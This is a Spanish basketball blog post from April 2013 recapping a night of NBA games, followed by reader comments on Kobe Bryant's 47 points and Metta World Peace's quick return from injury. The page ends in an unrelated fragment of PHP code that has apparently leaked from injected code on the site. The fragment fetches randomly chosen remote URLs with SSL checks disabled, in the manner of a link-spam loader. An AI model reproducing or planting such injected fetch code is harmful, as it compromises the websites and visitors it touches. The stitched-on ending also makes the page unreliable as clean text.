La Crónica: Sin descanso

11 de April de 2013 por Simon

Jornada extensa en la NBA con 10 partidos, algunos con mucho en juego. Lo más destacado fueron los 47 puntos de Kobe en la victoria de Lakers, el cambio en la cabeza del Oeste merced a la victoria de Denver sobre los Spurs y el partidazo combinado de la pareja interior de Orlando.

Los Angeles Lakers ganaron por primera vez un back-to-back completo esta temporada y lo hicieron ante unos Portland Trail Blazers en cuadro que no pudieron contar con tres de sus cinco titulares. Lillard comenzó como un tiro el partido involucrando a todo el mundo y anotando con una facilidad pasmosa.  Gracias a eso los Blazers fueron capaces de abrir desde el principio las primeras diferencias superiores a 10 puntos, lo que hacía prever un nuevo bochorno y descalabro de los de D’Antoni. Lakers mejoró en el segundo cuarto y consiguió ir limando la diferencia hasta que en el tercer cuarto se pusieron por delante. No obstante la pareja Lillard/Aldridge no había dicho la última palabra y siguió poniendo las cosas difíciles hasta que en el último minuto los Lakers se dispararon finalmente en el marcador (113-106). Partidazo una vez más de Kobe pero sin un mísero minuto de descanso.  Howard y Gasol estuvieron a un muy buen nivel anoche certificando una clarísima mejoría en el final de esta liga regular. En Portland, Lillard y Aldridge se multiplicaron en busca de la victoria pero no lo lograron. Con esta victoria Lakers tiene muchas papeletas de acabar en puestos de Play Off, puestos de los que se descolgaron definitivamentelos Dallas Mavericks. Perdieron ante Phoenix Suns (102-91) y siguen sin cortarse la barba. Tras la derrota de ayer ya no creo que se la corten. Phoenix estuvo liderado por un gran Goran Dragic con 23 puntos y 13 asistencias. 

A pesar de la baja de dos titulares Denver continúa siendo una apisonadora en su casa. Ayer la víctima fueron los líderes de conferencia, San Antonio Spurs, a los que hicieron perder esa condición en favor de Oklahoma. Tras un primer cuarto en el que Denver solo fue capaz de anotar 11 puntos, los de Karl se rehicieron y comenzaron a practicar su buen baloncesto habitual para dar la vuelta al partido en el segundo cuarto. Durante el transcurso de la segunda parte, la intensidad y la batería infinita de jugadores que utilizan los Nuggets hizo que el partido cayera por su propio peso de su lado (86-96). Andre Iguodala capitaneó la victoria con un estupendo triple doble, mientras que Brewer y Chandler demostraron que están capacitados para suplir a Gallinari con 29 y 28 puntos respectivamente. Por su parte los líderes del Este y de la liga vencieron en un ajustado partido a los Wizards sin la participación de su “Big Three”. Allen desde el banco ejerció de líder a pesar de no estar fino desde la línea de 3 y la mayor experiencia Heat y el acierto desde el triple consiguieron la diferencia en el último cuarto a pesar de los esfuerzos de John Wall que se quedó a un rebote del triple doble (103-98).

En la zona noble del Este, Brooklyn continúa afinando la máquina y anoche vencieron a Boston Celtics en el TD Garden. En la primera parte los Nets fueron capaces de conseguir las primeras ventajas importantes y ya en la segunda no tuvieron problemas para mantenerlas en torno a los 10 puntos para llevarse el partido sin ninguna complicación, salvo la de la lesión de Gerald Wallace de la que no se sabe su alcance aún.  D-Will con 29 puntos y 12 asistencias fue el mejor jugador del partido (101-93). Atlanta Hawks sigue sumando victorias en pos de conseguir superar a los Bulls en la batalla por el quinto puesto del Este. Anoche vencieron a Philadelphia en un desigual partido en el que los Hawks tuvieron su punta de lanza en  Josh Smith, autor de 28 puntos y 12 rebotes, y la sorprendente aportación de los rookies, John Jenkins y Mike Scott, autores de 21 puntos y 6 asistencias y 17 puntos y 8 rebotes  respectivamente (124-101).

En el resto de partidos, en el Este los Bucks fueron vencidos por unos Magic liderados por la pareja interior Harris-Vucevic que se marcaron un partido de los de guardar en vídeo. Los Bucks perdieron al comienzo del partido a Jennings y poco después a Sanders por sendas lesiones. Tobias Harris tiene una pinta de jugón impresionante,. Ayer anotó el triple que forzaba la prórroga aunque falló el tiro libre adicional que podía haberle dado la victoria a Magic. En la prórroga, Orlando fue un vendaval y no dio opción a los Bucks (103-113). Por suparte, Detroit venció a Cleveland con un gran partido de Andree Drummond que sigue demostrando que tiene un gran futuro en la liga (111-104).

En el Oeste, Clippers sigue luchando por la ventaja de campo en primera ronda y ayer logró una victoria más para su complicada tarea. Anoche vencieron a los Wolves en un partido que se decantó muy pronto para los locales y que les premitió  repartir minutos entre toda la plantilla. Hasta 7 jugadores estuvieron por encima de los 10 puntos (95-111). Y para terminar, Sacramento venció a New Orleans en otro partido sin historia que Kings sentenciaron en la primera parte y en el que ni el arreón final de NOLA hizo peligrar el resultado (110-121). Ojo a la posible lesión de Anthony Davis tras chocar con Thornthon en una penetración.

PREMIOS

MVP: A un paso de cumplir los 35 años, Kobe Bryant se marca un partido antológico en la visita de los Lakers al Rose Garden. 47 puntos, 5 asistencias, 8 rebotes, 3 robos y 4 tapones en 48 minutos de juego. ¿Quien necesita descansar a esa edad?

Rookie: Exhibición de Damian Lillard ante los Lakers. El rookie dejó su sello ante Kobe Bryant y anotó 38 puntos y repartió 9 asistencias. Andre Drummond también jugó un buen partido con 29 puntos y 11 rebotes, John Henson capturó 25 rebotes y anotó 17 puntos saliendo desde el banco, y Brian Roberts cuajó un partido completísimo de 20 puntos, 6 rebotes, 5 asistencias2 robos y 1 tapón. Y minutos para Doron Lamb, John Jenkins y Mike Scott y buenas actuaciones. Buen día para los jóvenes.

Sorpresa: No lo son tanta porque han demostrado en más de una ocasión de lo que son capaces pero el partidazo conjunto del dúo Tobias Harris Nikola Vucevic se sale de las gráficas. Los 2 anotaron 30 puntos y cogieron 19 y 20 rebotes, respectivamente.

Decepción: Jrue Holiday debe desear con todas sus fuerzas que termine ya la temporada. La gasolina se le acabó hace tiempo y actuaciones como la de ayer (4 de 14 y 5 pérdidas) comienzan a ser demasiado habituales. Greivis Vasquez y Larry Sanders tampoco estuvieron muy acertados. Mal días para varios candidatos al premio a jugador más mejorado.

Esfuerzo en vano: Los ya nombrados de Damian Lillard y John Henson. Partidazos sin recompensa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Pues ahora sí voy a desfogarme tranquilo.

    Me parece vergonzoso y absolutamente patético que los Lakers hayan necesitado 48 minutos y 47 puntos de Kobe Bryant para vencer a unos Blazers sin Hickson, Batum, Matthews y con 4 rookies en su quinteto titular (+ Aldridge). Pero no sólo 47 puntos de Kobe. Además, 8 rebotes, 5 asistencias, 3 robos y 4 tapones, 18-18 TL. Gasol y Howard hicieron un buen partido pero el banquillo estuvo totalmente desaparecido, 12 puntos en 3 jugadores con 5-13 en TC.

    Lo que Portland hizo bien fue empezar como una moto, salir a por todas y querer destruir la moral angelina. Casi les sale bien, porque iniciaron con un 2-8, 6-15, 12-19, y acabaron el cuarto 33-41, de la mano de 17 puntos de Bryant, más de la mitad de los puntos anotados por Lakers, y en el 1er cuarto, donde Kobe suele dosificarse… lo cual fue imposible porque si se llega a dosificar se acaba el partido ahí mismo. La defensa de los Lakers estuvo absolutamente desaparecida durante los primeros 24 minutos, para mejorar en la 2ª parte y dejar a los Blazers sobre un 39% en TC en los últimos dos cuartos. Los Lakers dieron caza a los Blazers en el 3er cuarto y a partir de ahí fue un toma y daca del que, frente a equipos fuera de PO o de últimos puestos de los mismos, suele salir ganador Kobe Bryant. Aparte, la no existencia de un buen defensor en el cuadro de Portland hacía todo más fácil al 24 angelino. Bryant se convirtió en el rival con máxima anotación en el Rose Garden.

    Además de los 48 minutos y 47 puntos, se encargó en gran parte del partido de la defensa de Lillard, lo cual produce más desgaste tanto físico como moral, pues Damien ROY Lillard anotó 38 puntos con 12-25 en TC, aunque es cierto que comenzó con 3-3 en triples ante Blake, luego un 9-22 posterior no está muy mal.

    El nivel de Gasol desde que volvió de la lesión, y jugando más al poste bajo (8 partidos): 16’4p, 8’8r, 5’8a, 58% TC.

    Vídeo con las canastas de Bryant: http://www.youtube.com/watch?v=_4jLwh4vfwE&feature=youtu.be

    PD: Oklahoma ya es 1º de conferencia y viendo el calendario que le quedan a ellos y a Spurs, creo que se mantendrán ahí. A priori me parece malo para los Lakers, quienes casi con total seguridad serán 8ºs (de entrar en PO, claro está).

      Citar

  2. Denise dice:
    #2

    ¿Alguien puede darme un comentario médico de como es posible que Metta se haya recuperado tan rápido?

    El partido de ayer de Harris deja aun mas fuera del proyecto de los Magic a Glen Davis, auque yo mantendría al gordito y me quedaría con una pintura Harris-Quinn-Nicholson (aunque está pasando por un rookie wall de cojones) y Vucevic-Davis.

    Lo que pasa es que en Orlando se debate si convertir a Harris en un alero (SF) fortachón tipo Carmelo Anthony (salvando las distancias) ó dejarlo como 4 (PF) bajito pero físico tipo Blake Griffin (salvando las distancias).

      Citar

  3. txusma dice:
    #3

    Denise:

    Lo que pasa es que en Orlando se debate si convertir a Harris en un alero (SF) fortachón tipo Carmelo Anthony (salvando las distancias) ó dejarlo como 4 (PF) bajito pero físico tipo Blake Griffin (salvando las distancias).

    Entonces tendrán q decidir tb que hacen con Mo Harkless. Por cierto, buenos minutos de Doron Lamb como escolta.
    Si en el draft pueden pillar a Marcus Smart tienen el equipo hecho para unos años.

      Citar

  4. Denise dice:
    #4

    txusma: Entonces tendrán q decidir tb que hacen con Mo Harkless. Por cierto, buenos minutos de Doron Lamb como escolta.Si en el draft pueden pillar a Marcus Smart tienen el equipo hecho para unos años.

    Doron Lamb al igual que Harris, motivadisimo ante su ex-equipo, 16 puntos, su cifra mas alta como profesional.
    Un dato estadístico, ningún duo hacía 30 puntos y más de 19 rebotes desde el 15 de marzo de 1967 en el que lo hiceron Willis Reed y Walt Bellamy para los Knicks

      Citar

  5. MagicJohnson32 dice:
    #5

    Denise:
    ¿Alguien puede darme un comentario médico de como es posible que Metta se haya recuperado tan rápido?

    Por lo visto, leyó en internet que un deportista sólo estuvo una semana de baja tras la misma operación, y decidió que entonces él no iba a estar más tiempo, jojo.

    La explicación creo que es un altísima tolerancia al dolor y el tremendo grado de inconsciencia que ya le conocemos.

      Citar

  6. Denise dice:
    #6

    MagicJohnson32: Por lo visto, leyó en internet que un deportista sólo estuvo una semana de baja tras la misma operación, y decidió que entonces él no iba a estar más tiempo, jojo.

    eso es lo que ha dicho Metta ó lo estas diciendo en plan vacile ?

      Citar

  7. Jose Luis dice:
    #7

    Lo dijo Metta, son palabras suyas.

    Por lo visto la clave es que despues de estas operaciones suele hincharse la zona afectada, lo cual retrasa la rehabilitación e impide que se pueda jugar, pero Metta no sufrió dicha inflamación, será por su complexión o su oroganismo. Asi pues, los médicos estaban de gira con el equipo y Metta les informó de que no sufría inflamación y quería empezar la rehabilitación de inmediato. Gary Vitti le dijo que esperase a su vuelta pero Metta le dijo que no, que empezaría por su cuenta y tras una webcam comprobaron que no había inflamación y le informaron de los ejercicios a realizar.

    Aparte, seguro que está tolerando bastante dolor pero es Metta, Megatron (Sacre dixit). Desde luego su lucha, compromiso y entrega está fuera de tda duda. Dijo que si podía dar 5-10 minutos de descanso a Kobe, eso que ganaban los Lakers.

    PD: También ha dicho que el principal motivo de su vuelta es que “soy demasiado sexy para mi gato, y para llevar rodillera, asi que tenía que volver cuanto antes a las canchas.”

      Citar

  8. Jose Luis dice:
    #8

      Citar

  9. Denise dice:
    #9

      Citar

  10. Jose Luis dice:
    #10

    Es Metta… vaya sonrisita tiene el cabron

      Citar

  11. MagicJohnson32 dice:
    #11

    Jose Luis:
    Pues ahora sí voy a desfogarme tranquilo.

    Me parece vergonzoso y absolutamente patético que los Lakers hayan necesitado 48 minutos y 47 puntos de Kobe Bryant para vencer a unos Blazers sin Hickson, Batum, Matthews y con 4 rookies en su quinteto titular (+ Aldridge). Pero no sólo 47 puntos de Kobe. Además, 8 rebotes, 5 asistencias, 3 robos y 4 tapones, 18-18 TL. Gasol y Howard hicieron un buen partido pero el banquillo estuvo totalmente desaparecido, 12 puntos en 3 jugadores con 5-13 en TC.

    Fue patético, sí, sobre todo el primer cuarto. Además, estaba clarísimo que los Blazers iban a salir así, con Lillard al ataque, a tirar triples y a correr. Y nada, a los 4 minutos 6-15 y a sufrir, como de costumbre. Es cierto, que la defensa mejoró conforme avanzó el partido, algo que ya ha pasado últimamente en varios encuentros, pero o empiezan a defender desde el minuto 1 o no van a ganar los partidos que faltan.

    Excelente de nuevo Pau, al que Dwight le debe muchísimo.

    Y lo de Kobe es que no es normal. Qué animal.

      Citar

  12. GreenPride dice:
    #12

    Bueno pues con esta agónica victoria ante unos lastradísimos Blazers a los Lakers sólo les queda cumplir en casa para entrar en PO, pudiendo incluso permitirse un fallo si confían en que los Grizzlies ganen en casa en la última jornada a los Jazz así que el panorama parece ya más claro para los de LA aunque dada la inconsistencia con la que se están moviendo cualquiera se juega algo por ellos. Bryant va a llegar muerto a PO. Al menos Pau y Howard han mejorado mucho lo que les da alguna esperanza de dar guerra aunque a día de hoy su enfrentamiento ha cambiado y los Spurs se caen del primer puesto para dejárselo a los Thunder lo que para Lakers creo que es una mala noticia.
    Del resto buena victoria de los Nets que les puede costar muy cara si Wallace se ha lesionado de gravedad. El único jugador que poner delante de LeBron en la primera ronda de PO y si se lesiona será una baja importantísima aunque de primeras no parece que vaya a ser muy grave. MIentras los campeones están medio de vacaciones preparando sus cuerpos para las luchas de los PO… qué miedo

      Citar

  13. Jose Luis dice:
    #13

    Es que quitan al big-three, salen los suplentes en Washington, que venían jugando muy bien… y ganan.

      Citar

  14. Ruxixón dice:
    #14

    Jose Luis:
    Mirad al loco:
    http://www.basket4us.com/blog/2013/04/10/metta-world-peace-soy-muy-sexy-para-mi-gato-80530.html

    Están los desequilibrados y luego está Metta World Peace,madre mía xDD

    Lo más significativo,ya que hablamos de él,es como la mayoría de fan de Lakers se preocuparon con su baja cuando en condiciones normales todo el mundo querría echarlo a patadas de allí.Se ha hecho vital en desconcierto de D’Antoni

      Citar

  15. Jose Luis dice:
    #15

    35% desde la esquina, abriendo siempre la cancha, con gran capacidad defensiva, esfuerzo, entrega, versatilidad. Es importante en estos Lakers, siempre lo ha sido desde que está aqui. Ultimamente anotaba hasta eesas penetraciones de bote antiestético xD

      Citar

  16. MagicJohnson32 dice:
    #16

    Ruxixón: Están los desequilibrados y luego está Metta World Peace,madre mía xDD

    Lo más significativo,ya que hablamos de él,es como la mayoría de fan de Lakers se preocuparon con su baja cuando en condiciones normales todo el mundo querría echarlo a patadas de allí.Se ha hecho vital en desconcierto de D’Antoni

    Lo de MWP es como lo de Kobe saliendo a jugar cojo en Indiana: sirve de inspiración para un equipo que no ha encontrado inspiración en toda la temporada. No te creas que es poca cosa.

      Citar

  17. nba dice:
    #17

    Yo no se si lo de MWP puede servir de inspiracion, pero de lo que si sirve es para recalcar aun mas la incompetencia de D’antoni, ni me quiero imaginar la situacion si Metta no se hubiese recuperado antes de tiempo, seguro que el cazurro D’antoni seguiria con su rotacion de 7 jugadores contra viento y marea, al menos se esta cavando su propia tumba.
    Habra que revisar la partida de nacimiento de Kobe, no vaya a ser que no tenga la edad que pone , porque lo de estos partidos esta siendo monstruoso..

      Citar

  18. Denise dice:
    #18

    Hablando de MWP, me ha entrado ganas de ver la pelea en el Palace pero con los comentarios originales de Sixto y Daimiel. ¿Alguien tiene a mano el enlace de youtube?

      Citar

  19. MagicJohnson32 dice:
    #19

    nba:
    Yo no se si lo de MWP puede servir de inspiracion, pero de lo que si sirve es para recalcar aun mas la incompetencia de D’antoni, ni me quiero imaginar la situacion si Metta no se hubiese recuperado antes de tiempo, seguro que el cazurro D’antoni seguiria con su rotacion de 7 jugadores contra viento y marea, al menos se esta cavando su propia tumba.

    D’Antoni fue CoY 2005 con una rotación cortísima en los Suns, cinco tíos jugando +35 minutos. Supongo que ya no vamos a cambiarlo a estas alturas.

    Denise, ni idea. De hecho, creo que nunca he visto el vídeo de la pelea en castellano.

      Citar

  20. Melo15 dice:
    #20

    Yo ?o vi un dia pero y me fue facil encontrarlo. Ahora te lo busco.

      Citar

  21. Denise dice:
    #21

    MagicJohnson32: D’Antoni fue CoY 2005 con una rotación cortísima en los Suns, cinco tíos jugando +35 minutos. Supongo que ya no vamos a cambiarlo a estas alturas.Denise, ni idea. De hecho, creo que nunca he visto el vídeo de la pelea en castellano.

    Hay video en español, comentado en directo por Sixto y Daimiel, hará como 4 años lo ví por ultima vez, pero ahora con la leche de los copyrights no lo encuentro..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>